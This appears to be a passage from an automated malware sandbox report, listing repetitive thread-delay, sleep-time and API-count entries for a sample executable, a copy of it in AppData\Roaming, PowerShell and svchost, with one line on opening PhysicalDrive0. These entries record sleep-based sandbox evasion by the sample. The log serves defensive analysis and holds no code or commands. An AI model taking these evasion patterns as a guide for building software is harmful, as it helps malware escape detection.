Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 594624	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 599641
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 599529
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 599422
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 599063
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 598953
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 598844
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 598719
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 598610
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 598485
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 598360
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 598235
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 598110
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 597985
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 597370
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 597141
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 597016
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 596907
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 596782
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 596657
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 596547
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 596438
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 596313
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 596188
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 596063
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 595938
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 595829
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 595704
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 595579
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 595454
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 595329
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 595093
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 594956
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 594831
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 594710
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 594601
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 594491
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 594375
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 594266
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 594156

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7307	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 933	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7097	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Window / User API: threadDelayed 8172	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Window / User API: threadDelayed 1689	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Window / User API: threadDelayed 7853
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Window / User API: threadDelayed 1989

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 6196	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6728	Thread sleep count: 7307 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6740	Thread sleep count: 933 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1468	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6892	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5608	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5524	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 5716	Thread sleep count: 8172 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 5716	Thread sleep count: 1689 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -598887s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -598671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -598232s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -598124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -598014s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -597796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -597577s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -596921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -596593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -596374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -596265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -596046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -595937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -595718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -595499s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -595390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -595281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -595171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -595062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -594843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe TID: 7008	Thread sleep time: -594624s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 5540	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6528	Thread sleep count: 7853 > 30
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6528	Thread sleep count: 1989 > 30
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -599766s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -599641s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -599529s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -599422s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -599313s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -599188s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -599063s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -598953s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -598844s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -598719s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -598610s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -598485s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -598360s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -598235s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -598110s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -597985s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -597860s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -597735s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -597610s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -597485s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -597370s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -597250s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -597141s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -597016s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -596907s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -596782s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -596657s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -596547s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -596438s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -596313s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -596188s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -596063s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -595938s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -595829s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -595704s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -595579s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -595454s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -595329s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -595203s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -595093s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -594956s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -594831s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -594710s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -594601s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -594491s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -594375s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -594266s >= -30000s
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe TID: 6708	Thread sleep time: -594156s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6960	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2296	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 598887	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 598232	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 598124	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 598014	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 597577	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 596374	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 596046	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 595499	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Thread delayed: delay time: 594624	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 599641
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 599529
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 599422
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 599063
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 598953
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 598844
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 598719
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 598610
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 598485
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 598360
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 598235
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 598110
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 597985
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 597370
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 597141
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 597016
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Thread delayed: delay time: 596907
